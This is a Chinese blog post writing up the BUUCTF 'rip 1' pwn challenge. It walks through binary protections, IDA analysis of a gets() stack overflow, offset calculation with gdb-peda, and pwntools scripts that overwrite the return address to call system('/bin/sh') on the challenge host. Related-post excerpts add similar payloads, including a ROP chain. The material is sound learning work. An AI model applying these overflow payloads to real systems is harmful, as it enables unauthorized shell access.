pwn | BUUCTF rip 1&& pwn基本思路

于 2024-04-26 17:43:46 发布
阅读量1.5k 收藏 33
点赞数 39
分类专栏: CTF 文章标签: CTF pwn python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mintind/article/details/138209736
版权

题目:BUUCTF rip 1
整体参考:
添加链接描述(写得好详细我好爱
BUUCTF (PWN) RIP详细分析(为什么payload有两种写法
其他知识&&引用:
二进制的保护机制
8086汇编语言dup指令学习
【Tips】使用gdb-peda进行RIP覆盖点偏移量的计算

2024.04.26

pwn基本思路

太久没碰pwn了(而且本来也不是很熟),几乎全忘了,通过这道题整理一下基本做题思路

题面

(以下是我的瞎理解)
题目会给一个靶机(?)地址和端口,给一个附件
这个附件是和远程一样的内容,连远程其实相当于远程运行这个附件程序
所以可以通过对附件的检查和解析来帮助我们确定怎么去获取远程控制权(system("/bin/sh")),最终得到flag
需要注意的是,不管怎么分析附件程序,最终还是要通过远程连接获取flag,这才是pwn的目的,所以有些本地和远程运行起来不一样的地方要特别注意(对的我在提醒我自己我个大傻子
在这里插入图片描述

checksec

可以查看文件类型和linux下的ELF二进制文件的保护机制
在这里插入图片描述
二进制保护机制
来自二进制的保护机制

1.Canary(栈保护)
这个选项表示栈保护功能有没有开启。
栈溢出保护是一种缓冲区溢出攻击缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让shellcode能够得到执行。当启用栈保护后,函数开始执行的时候会先往栈里插入cookie信息,当函数真正返回的时候会验证cookie信息是否合法,如果不合法就停止程序运行。攻击者在覆盖返回地址的时候往往也会将cookie信息给覆盖掉,导致栈保护检查失败而阻止shellcode的执行。在Linux中我们将cookie信息称为canary。
2.NX/DEP(堆栈不可执行)
NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。
3.PIE/ASLR(地址随机化)
4.Fortify
这个保护机制查了很久都没有个很好的汉语形容,根据我的理解它其实和栈保护都是gcc的新的为了增强保护的一种机制,防止缓冲区溢出攻击。由于并不是太常见,也没有太多的了解。
5.RelRO
设置符号重定向表格为只读或在程序启动时就解析并绑定所有动态符号,从而减少对GOT(Global Offset Table)攻击。

附件分析

我一般用ida,上面查了是64位的所以用ida64打开
main函数有明显的漏洞,gets,又没有栈溢出保护,可以栈溢出
在这里插入图片描述字符里很容易发现/bin/sh(获取权限的命令,pwn手最爱
双击找到字符串的地址
在这里插入图片描述在这一行上右键,选Xrefs to,可以看到哪里引用了这个字符串(不知道有没有别的办法
在这里插入图片描述在这里插入图片描述来看看fun这个函数
在这里插入图片描述直接是system("/bin/sh"),非常的好,那么只要通过栈溢出把返回地址改成这个fun函数的地址就行了(0x401186

算偏移量

看地址算偏移量

点进去main函数里的输入字符串s,看到一共15个字节
在这里插入图片描述注意到后边有个db 8 dup(?)
来自8086汇编语言dup指令学习
dup是duplicate的缩写,重复的意思;
用来定义重复的字节、字、双字、结构等内存缓冲区;

db x dup(),x是重复的次数,()里是要重复的数,逗号分隔;

  db 重复的次数 dup (重复的字节性数据)
  dw 重复的次数 dup (重复的字型数据)
  dd 重复的次数 dup (重复的双字性数据)

那就需要15+8=23个字节
为什么要加上这个dup呢,似乎是要覆盖ebp,ebp后面才是返回地址,64位的ebp是8B

gdb-peda算偏移量

gdb和peda都要先配置好像,之前配过了所以直接用了,这里是默认进peda

gdb pwn1

在这里插入图片描述生成溢出字符串

pattern create 200

这个200是指定字符串的长度,要保证能够产生溢出
在这里插入图片描述r或者run命令让程序运行
在这里插入图片描述汗流浃背了,忘了给附件可执行权限,用chmod改一下再来
在程序提示输入的时候把上面生成的溢出字符串贴上去(注意去掉单引号),发生段错误

在这里插入图片描述此时RBP里存的是nAACAA-A,这段字符在整个溢出字符串中的的偏移就是我们要求的输入开头到返回地址的偏移量
使用pattern offset计算偏移
在这里插入图片描述
也可以看栈顶的偏移
在这里插入图片描述
直接得到23在这里插入图片描述

写脚本

脚本模板:

from pwn import * #引入pwn库

p = remote(ip, port) # 输入对应的ip地址和端口号来连接其他主机的服务

... # 输入payload来进行操作以拿到程序的shell payload一般等于 偏移量 + 地址

p.interactive() # 反弹shell
1
from pwn import *

p = remote('node5.buuoj.cn', 29467)
p.sendline(b'a' * 15 + p64(0x401186))
p.interactive()
2
from pwn import *

p = remote('node5.buuoj.cn', 29467)
p.sendline(b'a' * 23  + p64(0x401198) + p64(0x401186))
p.interactive()

这里在返回地址前要填一个ret的地址,实测0x401198(fun的ret)、0x401185(main的ret)、0x4010C0(deregister_tm_clones的ret)都可以,应该什么ret都可以
在这里插入图片描述在这里插入图片描述在这里插入图片描述
这里为什么payload这两种都可以我还是不太明白,在这篇文章的反思里有些解释
BUUCTF (PWN) RIP详细分析
还是没懂…以后再说吧

连远程,cat flag

写完之后运行
在这里插入图片描述

Mintind
关注
专栏目录
初学pwn-BUUCTF(rip)
天柱的博客
08-30 2569
初学pwn-writeUp BUUCTF平台的一道题目,rip。 与之前同样的步骤,启动靶机,链接远端 发现这里提示输入一些内容,但是输入完成之后,这里就结束了。还是要打开文件查看一下。 看到这里,只有一个输入的过程可以操作,那就很清楚了,就是要栈溢出了。点进去看一下。 可以看到这里s这个数组是15个字节,到r这个返回值还需要8个字节。不过这里要注意的一点是,这个15是十进制的,不能像之前再在数字之前加0x标记十六进制,这里可以直接写十进制。 摁shift+f12,可以看到这时还有什么地址可能会用到,
BUUCTF PWN rip1 WP
m0_54262894的博客
07-31 2585
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录。 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后将字符输出。 把文件放在ida中查看一下 发现main函数并不复杂,只是定义了一个 s ,而且我们很容易就能找到栈溢出的点,我们都知道gets函数是一个危险函数,对于我们来说它可以接受到无限的字符,所以这里就是我们要pwn掉的点。 我们双击 s ,看它有多少空...
BUUCTF刷题之路-rip1
qq_30528603的博客
05-25 1544
因为A存入内存是以ASCLL码形式存在 0x41就是A,我们填入的15个A已经在栈上了,而且返回地址就是401100,我们要做的就是覆盖这个返回地址,指向我们的后门函数fun,至此这题就完成了。让我们能得到一个shell.那我们就找一下这个fun函数的地址,因为题目没有开启PIE,所以程序每次加载的地址都是不变的。可以看到保护基本没开,是个很简单的栈溢出题目。左边这都是函数,带下划线的一般是系统提供的函数,我们分析前可以大致看看有哪些函数,都干了什么,对整体布局有个了解,我们一开始都回去分析main函数。
BUUCTF_PWN - rip
weixin_46009088的博客
12-06 744
BUUCTF_PWN - rip 查看程序保护模式和文件基本信息: 没有什么保护,各条保护详情介绍请看胡写瞎写(1) pwntools常见命令,另外文件是64位小端程序 IDA载入 找到main函数F5: 发现一个 gets ( ) 函数,一个可以利用的漏洞点,gets ( ) 函数介绍: get( )函数简单易用,它读取从输入流中读取一行,赋给字符串变量s,直到遇到换行符,然后丢弃换行符,存储其余的字符,并在结尾添加一个空字符使其成为一个 C 字符串,但是它无法检查数组是否装的下,因此它只知道开始处,.
BUUCTF - PWNrip
古月浪子的博客
03-19 1649
checksec一下,发现啥保护也没开 IDA打开看看,明显的栈溢出漏洞,IDA给出了s的长度为0xf 发现后门函数 脚本中使用地址0x401186发现不行(不知道为什么),换成0x401187发现可以 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.l...
[BUUCTF-pwn]——rip
Y_peak的博客
01-30 1230
BUUCTF——rip 题目地址:https://buuoj.cn/challenges 题目: 同样我们现将文件下载下来,在Linux上用checksec 看下信息,发现这是一个64位程序,并且任何保护都没开。???? (任何保护都没开,基本就是栈溢出) 在window用IDA反汇编看看,打扰了main函数没有任何有用的东西,没有我们要找的system函数 看看其他函数看看有没有,功夫不负有心人。fun函数中,有我们想要的东西 赶快查看下fun函数所在的位置 0x401186 。我们看到是在0x
BUUCTF-rip 尝试PWN入门
brightendavid的博客
05-04 1581
BUUCTF-rip 拿到的是一个什么呢,感觉是一个小系统? 但是也就是一个小程序嘛。 这个程序就是执行一个输入输出 的命令。但是这里面存在漏洞。 这个s是15byte的字符 在fun部分有一个/bin/sh 这个据说是一个系统级函数,为什么说是系统级函数呢,因为有一个system吧。 一般会是什么用都没有。 但是在使用这样的一个payload后,就可以利用,也不知道这个pwn 库是做了什么。感觉像是变魔术。要刚好把堆栈覆盖到这个系统函数的位置?是不是这个解释呢。 #python3 需要预先安
BUUCTF pwn rip
weixin_55190422的博客
11-03 342
现在开始是记录我个人对BUU上PWN题的刷题记录。 首先是一个ELF文件,放到Linux里面来看。 首先老套路checksec一下 接着我们将这个文件放到IDA中静态分析、 shift F12 一下看看敏感字段 我们发现里面有个系统调用函数。我们查看下汇编代码 我们查看Stack of main 视图发现只要存入15个字节就可以返回fun函数 所以payload: from pwn import * p = remote('node4.buuoj.cn',...
BUUCTF pwn——rip
CNS-Enterprise BCC-1701-J
03-10 323
BUUCTF 做题练习
Pwn | CTFBUUCTF rip1
最新发布
weixin_46301214的博客
02-02 632
可能是因为fun函数里有system这种终端控制函数,所以能getshell吧。那么来看一下main,发现很简单,只有一个gets获取输入,存到s数组变量里。打开IDA,发现函数里有一个fun函数,能直接调用系统函数。然后又可以建立连接,很屌,解释不清楚,以后做多两题才懂。知道了缓冲区大小,下一步就要知道fun函数的入口地址。这文件是在靶机,就是靶机存在这个漏洞,我们要攻击他。从汇编上看,是能够发现有注释告诉我们的入口地址。我们要做的就是利用这个函数进行调用系统函数。看一下双击s变量,缓冲区大小。
BUUCTF(Pwn) rip
半岛铁盒的博客
03-20 488
按tab键,看一下 fun函数 发现其地址是 0x401186; 但是写EXP不能直接用这个地址,需要使用0x40118A这个地址,system函数是在0x40118A压参数然后执行 from pwn import * p = remote('node3.buuoj.cn', '25677') payload = 'a' * (0xf + 8) + p64(0x40118A) p.sendline(payload) p.interactive() ...
BUUCTF -rip
weixin_56301399的博客
07-20 440
用IDAPro64bit打开pwn1后按F5反汇编源码并查看主函数,发现gets()函数读取输入到变量s中,s的长度只有0xf,即可用栈大小只有15字节,但是gets()函数并没有限制输入,显然存在栈溢出漏洞。先file./pwn1查看文件类型再checksec--file=pwn1检查一下文件保护情况。且fun()函数的起始地址为0x401186。得到信息64位,各项保护都未开启。......
BUUCTFrip
^_^
12-08 3317
这题和蒸米ROP的level3有点像。 检查安全机制。 用ida反汇编,可以看到是gets函数有个简单的栈溢出,偏移也很好计算,F+8=23 此外还发现一个fun函数可以直接跳转到这里来获取shell。 正常exp如下: from pwn import * p = process("./pwn1") #p = remote("node3.buuoj.cn",29399) payload = "a" * 23 +p64(0x401186) p.sendline(payload) p.interact
BUUCTF|rip
cm_zl
04-30 2166
from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28808") payload = "A"*(0xf + 8) + p64(0x401198)+ p64(0x401186) io.sendline(payload) io.interactive()
BUUCTF (PWN) RIP详细分析
热门推荐
qy201706的博客
04-08 1万+
很简单的栈溢出,不过对于栈溢出具体过程不理解的会卡的很惨; 由于初学嘛,就看了网上的wp,好像都是之前版本的,现在用就不太对,可能我入坑BUUCTF比较晚,现在用的题都是运行在Ubuntu18上的,故需要考虑堆栈平衡~~
栈溢出的基础原理,EBP/EIP/ESP详解 --- buuctf rip 1题目讲解
yajuanpi4899的博客
11-28 6005
栈帧概念:一个基本函数所需要的栈空间,当调用子函数时需要调用新的栈帧 涉及到栈有三个寄存器(32):esp,eip,ebp-->对应64位的rsp,rip,rbp esp:指向当前栈帧的顶部。 ebp:指向当前栈帧的底部。 eip:指向当前栈帧中执行的指令。 栈溢出漏洞的基本方向是:父函数(caller)在调用子函数(callee)结束时,会取子函数的return address,这个地址中保存着父函数的基地址。即:在一个函数调用完以后,就要删除此时的栈帧并将Return Address
BUUCTF-rip
m0_64180167的博客
04-11 679
看了这个文章 我起码能理解我们栈溢出的目的在做题之前 我们需要先理解栈的存储方法从上往下看 就能理解入栈说回这道题目为什么这道题目是栈溢出。
BUUCTF rip 1
qq_56313338的博客
09-09 314
这是一题栈溢出,也提及了栈对齐操作
buuctf pwn rip 1,rop解法
amber_o0k的博客
11-07 1203
from pwn import * io = remote('node4.buuoj.cn', 27175) pop_rdi_ret=0x4011fb bin_sh=0x40201b syscall=0x401040 ret=0x401016 payload=b'a'*(0xf+8)+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh)+p64(syscall) io.sendline(payload) io.interactive() 这个解法有点复杂了,强行构造了一波rop。.
buuctf pwn
10-01
buuctf pwn是指一个CTF比赛中的pwn题目,其中包含了经典的栈溢出漏洞、ret2system和ret2text的漏洞利用方法。在栈溢出漏洞中,通过向缓冲区中输入超过其容量的数据,覆盖掉程序的返回地址,从而控制程序的执行流程。而ret2system是一种漏洞利用技术,通过修改返回地址为system函数的地址,来实现执行系统命令的目的。ret2text是一种类似的漏洞利用技术,通过修改返回地址为.text段中的某个特定地址,来实现执行指定代码的目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值